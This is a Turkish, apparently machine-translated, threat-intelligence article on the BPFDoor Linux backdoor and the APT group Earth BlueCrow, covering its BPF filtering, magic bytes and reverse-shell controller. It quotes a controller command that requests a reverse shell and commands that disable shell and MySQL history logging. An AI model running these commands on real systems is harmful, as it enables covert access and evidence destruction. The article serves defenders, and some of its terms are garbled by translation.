BPFDoor olarak bilinen sofistike bir arka kapı kötü amaçlı yazılımı, Asya, Orta Doğu ve Afrika’daki organizasyonları aktif olarak hedefliyor ve tespitten kaçınmak için ileri gizli tekniklerden yararlanıyor.
Bu Linux Backdoor, ağ trafiğini çekirdek düzeyinde izlemek için Berkeley Paket Filtreleme (BPF) teknolojisini kullanır ve bu da uzlaşmış sistemlere kalıcı erişimi sürdürürken geleneksel güvenlik taramalarından gizli kalmasına izin verir.
BPFDoor, Güney Kore, Hong Kong, Myanmar, Malezya ve Mısır’da belgelenen son saldırılarla telekomünikasyon, finans ve perakende sektörlerini hedefleyen gözlemlenmiştir.
.png
)
Kötü amaçlı yazılımların ağ bağlantı noktalarını dinlemeden çalışma yeteneği, bağlantı noktası taramaları gibi geleneksel güvenlik önlemlerini kullanmayı tespit etmeyi özellikle zorlaştırır ve uzun süreler boyunca tespit edilmemesini sağlar.
Trend mikro araştırmacıları, bu saldırıların arkasındaki tehdit aktörünü, bpfdoor’u siber boyama faaliyetleri için konuşlandıran ileri süren bir tehdit (APT) grubu olan Earth BlueCrow (kırmızı menshen olarak da izlenir) olarak kaydetti.
Telemetrelerine göre, grup en az dört yıldır aktiftir ve 2021 yılına dayanan birden fazla olayın kanıtıdır.
Kötü amaçlı yazılım tasarımı, işletim sisteminin çekirdeğine BPF filtreleri enjekte etmesini sağlar, burada ağ paketlerini denetleyebilir ve özel hazırlanmış “sihirli diziler” – belirli arka kapı işlevlerini tetikleyen önceden belirlenmiş bayt desenleri aldıktan sonra etkinleştirilebilir.
Bu rootkit benzeri özellik, BPFDoor’un sisteme karışmasını, süreç adlarını değiştirmesini ve tespit edilmesini önlemek için diğer kaçınma taktiklerini kullanmasını sağlar.
BPFDoor’dan etkilenen kuruluşlar için çıkarımlar şiddetlidir. Arka kapı, tehdit aktörlerinin hassas verilere ve sistemlere uzun süre erişmeleri için kalıcı, neredeyse görünmez bir kanal oluşturur ve bu da onu uzun vadeli casusluk işlemleri için ideal bir araç haline getirir.
Ters Kabuk Mekanizması: Gizli Kontrolör
BPFDoor’un yeteneklerinin merkezinde, saldırganların enfekte olmuş ana bilgisayarlara ters kabuk bağlantıları kurmasını sağlayan denetleyici modülü var.
Bu işlevsellik, tehdit aktörlerinin güvenliği ihlal edilmiş ağlara daha derinlemesine kazmalarını, yanal hareketi ve ek sistemlere ve hassas verilere erişimi kolaylaştırmasına izin verir.
Denetleyici, sihirli bayt (TCP için 0x5293 veya UDP için 0x7255 gibi), hedefin bağlanması için uzak IP adresi ve bağlantı noktası ve bir kimlik doğrulama şifresi içeren aktivasyon paketleri gönderir.
.webp)
Uygun şekilde yapılandırıldığında, bu, kurban makinesinden saldırganın sistemine geri dönen bir kabuk bağlantısı başlatır.
./controller -cd 22 -h 192.168.32.156 -ms 8000Bu komut, denetleyiciye enfekte edilmiş makineden (192.168.32.156) 8000 bağlantı noktasındaki saldırganın makinesine geri dönen bir kabuk bağlantısı istemesini söyler.
Kötü amaçlı yazılım yazarları, tehlikeye atılan sistemler hakkındaki faaliyetlerinin kanıtlarını ortadan kaldırmak için önlemler aldı:-
export MYSQL_HISTFILE=/dev/null
export HISTFILE=/dev/nullBu komutlar, komut geçmiş günlüğünü devre dışı bırakır ve saldırganların özellikle MySQL veritabanı yazılımını çalıştıran sistemleri hedeflemesini önerir.
Ağ savunucuları için, BPFDoor’u tespit etmek, birden fazla protokolde (TCP, UDP ve ICMP) çalışma yeteneği ve saldırganların aktivasyon için kullanılan sihirli bayt dizilerini değiştirme kolaylığı nedeniyle zorlayıcıdır.
Bu tehdit gelişmeye devam ettikçe, kuruluşlar BPFDoor iletişim ve aktivasyon dizileri ile ilişkili belirli kalıpları tespit edebilen gelişmiş izleme çözümleri uygulamalıdır.
Equip your team with real-time threat analysis With ANY.RUN’s interactive cloud sandbox -> Try 14-day Free Trial